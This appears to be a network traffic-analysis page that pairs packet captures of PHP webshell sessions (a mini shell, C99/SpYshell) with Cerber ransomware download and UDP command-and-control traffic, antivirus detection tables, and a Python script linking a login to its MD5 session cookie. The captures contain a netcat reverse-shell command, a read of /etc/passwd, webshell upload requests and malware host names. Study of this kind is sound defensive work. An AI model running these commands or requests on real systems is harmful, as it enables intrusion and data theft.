E..)p.@….O…f……….K..”..P…~………
2017-01-20 04:56:28.247493 IP 192.168.1.100.39338 > 192.168.1.102.4444: Flags [S], seq 1272629225, win 29200, options [mss 1460,sackOK,TS val 761732318 ecr 0,nop,wscale 7], length 0
E..<..@.@……d…f…\K………r..I………
-g……….
2017-01-20 04:56:28.295154 IP 192.168.1.102.55993 > 74.125.192.188.5228: Flags [.], seq 0:1, ack 1, win 258, length 1
E..)..@….Y…fJ}…..l….wm7KP….r……..
2017-01-20 04:56:28.435666 IP 192.168.1.102.56088 > 172.217.3.46.443: Flags [.], seq 0:1, ack 1, win 256, length 1
E..)..@……..f……..4.p….tP…=………
2017-01-20 04:56:30.251494 IP 192.168.1.100.39338 > 192.168.1.102.4444: Flags [S], seq 1272629225, win 29200, options [mss 1460,sackOK,TS val 761732819 ecr 0,nop,wscale 7], length 0
E..<..@.@……d…f…\K………r..I………
-g……….

2017-01-20 04:56:35.021686 IP 192.168.1.102.56180 > 192.168.1.100.55555: Flags [P.], seq 1:566, ack 1, win 2053, length 565
E..]/.@…D….f…d.t….p.f.TYP…_…GET /minishell.php?rev_option=PHP+Reverse+Shell&my_ip=192.168.1.101&my_port=4444 HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/minishell.php?rs
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: user=ry4wn; pass=5f4dcc3b5aa765d61d8327deb882cf99

2017-01-20 04:56:35.021703 IP 192.168.1.100.55555 > 192.168.1.102.56180: Flags [.], ack 566, win 237, length 0
E..(w”@.@.?….d…f…tf.TY..rIP….5..
2017-01-20 04:56:35.022202 IP 192.168.1.100.57978 > 192.168.1.101.4444: Flags [S], seq 3778293001, win 29200, options [mss 1460,sackOK,TS val 761734011 ecr 0,nop,wscale 7], length 0
E..<.r@.@..0…d…e.z.\.4-     ……r..H………
-g#{……..
2017-01-20 04:56:35.022902 IP 192.168.1.101.4444 > 192.168.1.100.57978: Flags [S.], seq 1108359154, ack 3778293002, win 14480, options [mss 1460,sackOK,TS val 288241756 ecr 761734011,nop,wscale 6], length 0
E..<..@.@……e…d.\.zB.7..4-
..8.t……….
..8\-g#{….
2017-01-20 04:56:35.022912 IP 192.168.1.100.57978 > 192.168.1.101.4444: Flags [.], ack 1, win 229, options [nop,nop,TS val 761734011 ecr 288241756], length 0
E..4.s@.@..7…d…e.z.\.4-
B.7……@…..
-g#{..8\
2017-01-20 04:56:35.024064 IP 192.168.1.101.4444 > 192.168.1.100.57978: Flags [P.], seq 1:17, ack 1, win 227, options [nop,nop,TS val 288241756 ecr 761734011], length 16
E..D..@.@……e…d.\.zB.7..4-
…..r…..
..8\-g#{cat /etc/passwd

2017-01-20 04:56:35.024076 IP 192.168.1.100.57978 > 192.168.1.101.4444: Flags [.], ack 17, win 229, options [nop,nop,TS val 761734012 ecr 288241756], length 0
E..4.t@.@..6…d…e.z.\.4-
B.8……@…..
-g#|..8\
2017-01-20 04:56:35.024600 IP 192.168.1.100.57978 > 192.168.1.101.4444: Flags [P.], seq 1:94, ack 17, win 229, options [nop,nop,TS val 761734012 ecr 288241756], length 93
E….u@.@……d…e.z.\.4-
B.8…………
-g#|..8\Linux wittyserver 4.3.0-kali1-amd64 #1 SMP Debian 4.3.3-5kali4 (2016-01-13) x86_64 GNU/Linux

2017-01-20 04:57:39.776713 IP 192.168.1.101.4444 > 192.168.1.100.57978: Flags [P.], seq 34:73, ack 4295, win 453, options [nop,nop,TS val 288248231 ecr 761737394], length 39
E..[..@.@……e…d.\.zB.8..4=…………
..Q.-g0.nc -nv 192.168.1.100 5555 -e /bin/bash

2017-01-20 04:57:39.777076 IP 192.168.1.101.22 > 192.168.1.100.53010: Flags [P.], seq 8009:8049, ack 2960, win 408, options [nop,nop,TS val 288248231 ecr 761750200], length 40
E..\..@.@.3….e…d…..xy.’bt4….t……
..Q.-gb…P@*.u..L%S.d..\r..d.@yo..>;.X..9.#n&h.
2017-01-20 04:57:39.777085 IP 192.168.1.100.53010 > 192.168.1.101.22: Flags [.], ack 8049, win 1233, options [nop,nop,TS val 761750200 ecr 288248231], length 0
E..4v.@.@.?….d…e….’bt4.xyF…..@…..
-gb…Q.
2017-01-20 04:57:39.777528 IP 192.168.1.100.57978 > 192.168.1.101.4444: Flags [P.], seq 4295:4335, ack 73, win 229, options [nop,nop,TS val 761750200 ecr 288248231], length 40
E..\..@.@……d…e.z.\.4=.B.8;…..h…..
-gb…Q.(UNKNOWN) [192.168.1.100] 5555 (?) open
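
Two details of the mini shell session above are worth checking rather than eyeballing: the login POST carries `usrname=ry4wn&passwrd=password` in the clear, and every later request carries `Cookie: user=ry4wn; pass=5f4dcc3b5aa765d61d8327deb882cf99`. The script below, an added example and not code from the page, parses both and tests whether each cookie value is the plaintext or an unsalted hash of a login field; it finds the `pass` cookie is the bare MD5 of the password, so anyone holding the capture holds a replayable credential.

```python
"""Correlate a webshell login POST with the session cookie it produced.

Added example, not from the original page. The request body and Cookie header
are copied from the Indrajith Mini Shell capture above; the hash list is an
assumption covering the algorithms such shells commonly use.
"""
import hashlib
from http.cookies import SimpleCookie
from urllib.parse import parse_qs

LOGIN_BODY = "action=login&hide=&usrname=ry4wn&passwrd=password"
COOKIE_HEADER = "user=ry4wn; pass=5f4dcc3b5aa765d61d8327deb882cf99"

HASHES = ("md5", "sha1", "sha256")


def parse_cookie(header: str) -> dict:
    """Cookie header -> {name: value}."""
    jar = SimpleCookie()
    jar.load(header)
    return {name: morsel.value for name, morsel in jar.items()}


def match_cookie_to_login(body: str, cookie_header: str) -> dict:
    """Return {cookie_name: (form_field, 'plaintext' | hash_algorithm)} for every
    cookie value that equals a login field or an unsalted hash of one."""
    fields = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    links = {}
    for cname, cvalue in parse_cookie(cookie_header).items():
        for fname, fvalue in fields.items():
            if cvalue == fvalue:
                links[cname] = (fname, "plaintext")
                break
            for alg in HASHES:
                if hashlib.new(alg, fvalue.encode()).hexdigest() == cvalue.lower():
                    links[cname] = (fname, alg)
                    break
            if cname in links:
                break
    return links


if __name__ == "__main__":
    for cookie, (field, how) in match_cookie_to_login(LOGIN_BODY, COOKIE_HEADER).items():
        print(f"cookie {cookie!r} is {how} of form field {field!r}")
```

For incident response this means the captured cookie is as good as the password for as long as the shell stays on the server: removing the file, not just changing the password, is what ends the access.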

C99 Webshell Backdoor SpYshell v.KingDefacer Traffic Analysis PCAP file download screenshots

C99 webshell usage, with a PCAP and screenshots of what it looks like; this has been one of the most commonly used webshells over the years.

2017-01-20 03:22:24.448614 IP 192.168.1.102.54057 > 192.168.1.100.55555: Flags [P.], seq 1:404, ack 1, win 2053, length 403
E…..@…Z|…f…d.)…..#.A..P…;…GET /c99.php?c99shcook[login]=0 HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8

2017-01-20 03:22:24.448633 IP 192.168.1.100.55555 > 192.168.1.102.54057: Flags [.], ack 404, win 237, length 0
E..(/.@.@……d…f…).A….  .P….5..
2017-01-20 03:22:24.449057 IP 192.168.1.100.55555 > 192.168.1.102.54057: Flags [P.], seq 1:327, ack 404, win 237, length 326
E..n/.@.@……d…f…).A….  .P….{..HTTP/1.0 401 Yetkisiz
Date: Fri, 20 Jan 2017 08:22:24 GMT
Server: Apache/2.4.18 (Debian)
WWW-Belgele: Basic realm=”SpYshell KingDefacer: Restricted area”SpYshell v.KingDefacer
Content-Length: 87
Connection: close
Content-Type: text/html; charset=UTF-8

<a href=”http://xxxxxxxxxxxxxxxxxxxxxxxx”>SpYshell v.KingDefacer</a>: Erisim Engellendi

2017-01-20 03:22:31.946998 IP 192.168.1.102.54059 > 192.168.1.100.55555: Flags [P.], seq 1:400, ack 1, win 2053, length 399
E…..@…Zr…f…d.+….:[.~..P…g=..GET /c99.php?ry4wn[login]=0 HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8

2017-01-20 03:22:31.947013 IP 192.168.1.100.55555 > 192.168.1.102.54059: Flags [.], ack 400, win 237, length 0
E..(.@@.@..u…d…f…+.~….;.P….5..
2017-01-20 03:22:31.952320 IP 192.168.1.100.55555 > 192.168.1.102.54059: Flags [P.], seq 1:5601, ack 400, win 237, length 5600
E….A@.@……d…f…+.~….;.P…….HTTP/1.1 200 OK
Date: Fri, 20 Jan 2017 08:22:31 GMT
Server: Apache/2.4.18 (Debian)
Zamani: Mon, 12 May 2005 03:00:00 GMT
Son Modifiye: Fri, 20 Jan 2017 08:22:31 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pratik: no-cache
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 5151
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

2017-01-20 03:22:31.983921 IP 192.168.1.102.54062 > 192.168.1.100.55555: Flags [P.], seq 1:384, ack 1, win 2053, length 383
E…..@…Zq…f…d…..s/p…@P….[..GET /c99.php?act=img&img=up HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: image/webp,image/*,*/*;q=0.8
Referer: http://192.168.1.100:55555/c99.php?ry4wn[login]=0
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8

2017-01-20 03:22:31.983929 IP 192.168.1.100.55555 > 192.168.1.102.54062: Flags [.], ack 384, win 237, length 0
E..(&.@.@……d…f…….@.s0.P….5..
2017-01-20 03:22:31.984218 IP 192.168.1.100.55555 > 192.168.1.102.54062: Flags [P.], seq 1:327, ack 384, win 237, length 326
E..n&.@.@..z…d…f…….@.s0.P….{..HTTP/1.0 401 Yetkisiz
Date: Fri, 20 Jan 2017 08:22:31 GMT
Server: Apache/2.4.18 (Debian)
WWW-Belgele: Basic realm=”SpYshell KingDefacer: Restricted area”
Content-Length: 87
Connection: close
Content-Type: text/html; charset=UTF-8

<a href=”http://xxxxxxxxxxxxxxxxxxxxxxxx”>SpYshell v.KingDefacer</a>: Erisim Engellendi

2017-01-20 03:22:56.211184 IP 192.168.1.102.54114 > 192.168.1.100.55555: Flags [P.], seq 1:624, ack 1, win 2053, length 623
E…..@…X….f…d.b……..E<P…x=..POST /c99.php?ry4wn[login]=0 HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Content-Length: 39127
Cache-Control: max-age=0
Origin: http://192.168.1.100:55555
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: multipart/form-data; boundary=—-WebKitFormBoundaryLoRtloEXoMSV9bhy
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/c99.php?ry4wn[login]=0
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8

2017-01-20 03:22:56.211200 IP 192.168.1.100.55555 > 192.168.1.102.54114: Flags [.], ack 624, win 238, length 0
E..(.`@.@..T…d…f…b..E<…7P….5..
2017-01-20 03:22:56.211450 IP 192.168.1.102.54114 > 192.168.1.100.55555: Flags [.], seq 624:5004, ack 1, win 2053, length 4380
E..D..@…I….f…d.b…..7..E<P….Q..——WebKitFormBoundaryLoRtloEXoMSV9bhy
Content-Disposition: form-data; name=”act”

upload
——WebKitFormBoundaryLoRtloEXoMSV9bhy
Content-Disposition: form-data; name=”uploadfile”; filename=”logo.png”
Content-Type: image/png

.PNG

Cerber Ransomware Trojan Malware read.php aoopoerope.top Traffic Analysis Full PCAP File Download

SHA256: edf9fd11f47c914459f673a5c635801208c14217a6d714f6b60b7ce4b62e54d8
File name: read.php
Detection ratio: 10 / 57
Analysis date: 2017-01-16 07:37:11 UTC

Engine                   Detection                                     Update
AhnLab-V3                Trojan/Win32.Cerber.C1748597                  20170116
Avast                    Win32:Malware-gen                             20170116
Avira (no cloud)         TR/Crypt.Xpack.amsqc                          20170116
Baidu                    Win32.Trojan.WisdomEyes.16070401.9500.9985    20170116
CrowdStrike Falcon (ML)  malicious_confidence_100% (D)                 20161024
ESET-NOD32               a variant of Win32/Injector.DJVO              20170116
Invincea                 worm.win32.kasidet.f                          20170111
Kaspersky                UDS:DangerousObject.Multi.Generic             20170116
Qihoo-360                HEUR/QVM42.0.0000.Malware.Gen                 20170116
Rising                   Malware.Generic!YNz7NgPxwWG@1 (thunder)       20170116

2017-01-15 23:39:23.889013 IP 192.168.1.102.62841 > 35.161.229.79.80: Flags [P.], seq 0:293, ack 1, win 256, length 293: HTTP: GET /read.php?f=0.dat HTTP/1.1
E..M=.@….}…f#..O.y.P.8..2>..P…>…GET /read.php?f=0.dat HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: aoopoerope.top
Connection: Keep-Alive

2017-01-15 23:41:05.390291 IP 192.168.1.102.63001 > 23.34.0.137.80: Flags [P.], seq 0:276, ack 1, win 256, length 276: HTTP: GET /pkiops/crl/MicWinProPCA2011_2011-10-19.crl HTTP/1.1
E..<Eq@……..f.”…..Pd……DP…+…GET /pkiops/crl/MicWinProPCA2011_2011-10-19.crl HTTP/1.1
Cache-Control: max-age = 393
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Mon, 26 Dec 2016 06:01:59 GMT
If-None-Match: “e6d8ca913d5fd21:0”
User-Agent: Microsoft-CryptoAPI/10.0
Host: www.microsoft.com
2017-01-15 23:46:50.548854 IP 192.168.1.102.63052 > 52.55.203.179.80: Flags [P.], seq 0:335, ack 1, win 256, length 335: HTTP: GET /?product=firefox-48.0.2-complete&os=win&lang=en-US HTTP/1.1
Host: download.mozilla.org
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Range: bytes=6000000-6299999
Connection: keep-alive

2017-01-15 23:46:54.245877 IP 192.168.1.102.63057 > 185.100.85.150.80: Flags [P.], seq 0:316, ack 1, win 256, length 316: HTTP: GET /C9E5-3757-4920-0446-96CD HTTP/1.1
Host: p27dokhpz2n7nvgr.onion.to
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

2017-01-15 23:47:54.290361 IP 192.168.1.102.63094 > 165.254.32.98.80: Flags [P.], seq 0:449, ack 1, win 256, length 449: HTTP: GET /openh264-win32-0410d336bb748149a4f560eb6108090f078254b1.zip HTTP/1.1
Host: ciscobinary.openh264.org
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
If-Modified-Since: Tue, 02 Aug 2016 18:34:14 GMT
If-None-Match: ac4fcf1b56303959919767d33473cbb9

Cerber Zerber Ransomware Trojan Malware oamnohndpiwpicgm.onion.to 194.165.16.* UDP C2 PCAP File Download Traffic Sample

SHA256: 7dd82320953cc4257259ec4bba37ee6485493d49ac35428918ea4a0d36988cd9
File name: 63b873380be779512d2ff1acdc2cc063.dat
Detection ratio: 40 / 55
Analysis date: 2017-01-16 07:28:17 UTC
AegisLab Troj.Ransom.W32.Zerber!c 20170116
AhnLab-V3 Trojan/Win32.Cerber.R191828 20170116
Arcabit Trojan.Generic.D3B3C08 20170116
Avast Win32:Trojan-gen 20170116
Avira (no cloud) TR/Crypt.Xpack.ptihk 20170116
BitDefender Trojan.GenericKD.3881992 20170116
Bkav HW32.Packed.D860 20170114
CAT-QuickHeal Ransom.Cerber.B 20170116
CrowdStrike Falcon (ML) malicious_confidence_82% (W) 20161024
Cyren W32/Trojan.TLPW-4766 20170116
DrWeb Trojan.Encoder.7233 20170116
ESET-NOD32 NSIS/Injector.MM 20170116
Emsisoft Trojan-Ransom.Cerber (A) 20170116

2017-01-15 23:24:56.595989 IP 192.168.1.102.62740 > 192.36.27.5.80: Flags [P.], seq 0:331, ack 1, win 256, length 331: HTTP: GET /upload/63b873380be779512d2ff1acdc2cc063.dat HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: oamnohndpiwpicgm.onion.to
Connection: Keep-Alive

2017-01-15 23:25:05.181614 IP 192.168.1.102.62746 > 23.64.74.2.80: Flags [P.], seq 0:240, ack 1, win 256, length 240: HTTP: GET /fwlink/?LinkId=57426&Ext=dat HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: go.microsoft.com
Connection: Keep-Alive

2017-01-15 23:25:10.559228 IP 192.168.1.102.62740 > 192.36.27.5.80: Flags [P.], seq 331:662, ack 145, win 256, length 331: HTTP: GET /upload/63b873380be779512d2ff1acdc2cc063.dat HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: oamnohndpiwpicgm.onion.to
Connection: Keep-Alive


2017-01-15 23:26:49.288685 IP 192.168.1.102.57428 > 194.165.16.1.6892: UDP, length 10
E..&uK….1….f…..T….6phi005c9027……..
2017-01-15 23:26:49.288734 IP 192.168.1.102.57428 > 194.165.16.2.6892: UDP, length 10
E..&.1………f…..T….6ohi005c9027……..
2017-01-15 23:26:49.288737 IP 192.168.1.102.57428 > 194.165.16.3.6892: UDP, length 10
E..&R…..Tw…f…..T….6nhi005c9027……..
2017-01-15 23:26:49.288786 IP 192.168.1.102.57428 > 194.165.16.4.6892: UDP, length 10
E..&i!….=….f…..T….6mhi005c9027……..
2017-01-15 23:26:49.288866 IP 192.168.1.102.57428 > 194.165.16.5.6892: UDP, length 10
E..&&……e…f…..T….6lhi005c9027……..
2017-01-15 23:26:49.288916 IP 192.168.1.102.57428 > 194.165.16.6.6892: UDP, length 10
E..&N…..XF…f…..T….6khi005c9027……..
2017-01-15 23:26:49.288919 IP 192.168.1.102.57428 > 194.165.16.7.6892: UDP, length 10
E..&………..f…..T….6jhi005c9027……..
2017-01-15 23:26:49.288966 IP 192.168.1.102.57428 > 194.165.16.8.6892: UDP, length 10
E..&S…..S….f…..T….6ihi005c9027……..
2017-01-15 23:26:49.289051 IP 192.168.1.102.57428 > 194.165.16.9.6892: UDP, length 10
E..&…….D…f…     .T….6hhi005c9027……..
2017-01-15 23:26:49.289100 IP 192.168.1.102.57428 > 194.165.16.10.6892: UDP, length 10
E..&t…..2’…f…
.T….6ghi005c9027……..

2017-01-15 23:26:52.735146 IP 192.168.1.102.57429 > 194.165.17.244.6892: UDP, length 24
E..4Si….Q….f…..U… ..8870f233185a005c950110f5
2017-01-15 23:26:52.735196 IP 192.168.1.102.57429 > 194.165.17.245.6892: UDP, length 24
E..4…….O…f…..U… ..8870f233185a005c950110f5
2017-01-15 23:26:52.735198 IP 192.168.1.102.57429 > 194.165.17.246.6892: UDP, length 24
E..4l…..8p…f…..U… ..8870f233185a005c950110f5
2017-01-15 23:26:52.735279 IP 192.168.1.102.57429 > 194.165.17.247.6892: UDP, length 24
E..4+…..z….f…..U… ..8870f233185a005c950110f5
2017-01-15 23:26:52.735329 IP 192.168.1.102.57429 > 194.165.17.248.6892: UDP, length 24
E..4yd….+….f…..U… ..8870f233185a005c950110f5
2017-01-15 23:26:52.735379 IP 192.168.1.102.57429 > 194.165.17.249.6892: UDP, length 24
E..4>…..f>…f…..U… ..8870f233185a005c950110f5
2017-01-15 23:26:52.735381 IP 192.168.1.102.57429 > 194.165.17.250.6892: UDP, length 24
E..4V…..Na…f…..U… ..8870f233185a005c950110f5
2017-01-15 23:26:52.746310 IP 192.168.1.102.57429 > 194.165.17.251.6892: UDP, length 24
E..4!……….f…..U… ..8870f233185a005c950110f5
2017-01-15 23:26:52.746315 IP 192.168.1.102.57429 > 194.165.17.252.6892: UDP, length 24
E..4*~….z….f…..U… ..8870f233185a005c950110f5
2017-01-15 23:26:52.746317 IP 192.168.1.102.57429 > 194.165.17.253.6892: UDP, length 24
E..4m8….7….f…..U… ..8870f233185a005c950110f5
2017-01-15 23:26:52.746320 IP 192.168.1.102.57429 > 194.165.17.254.6892: UDP, length 24
E..4.\………f…..U… ..8870f233185a005c950110f5
2017-01-15 23:26:53.725719 IP 192.168.1.102.57429 > 194.165.17.255.6892: UDP, length 24
E..4R…..R …f…..U… ..8870f233185a005c950110f5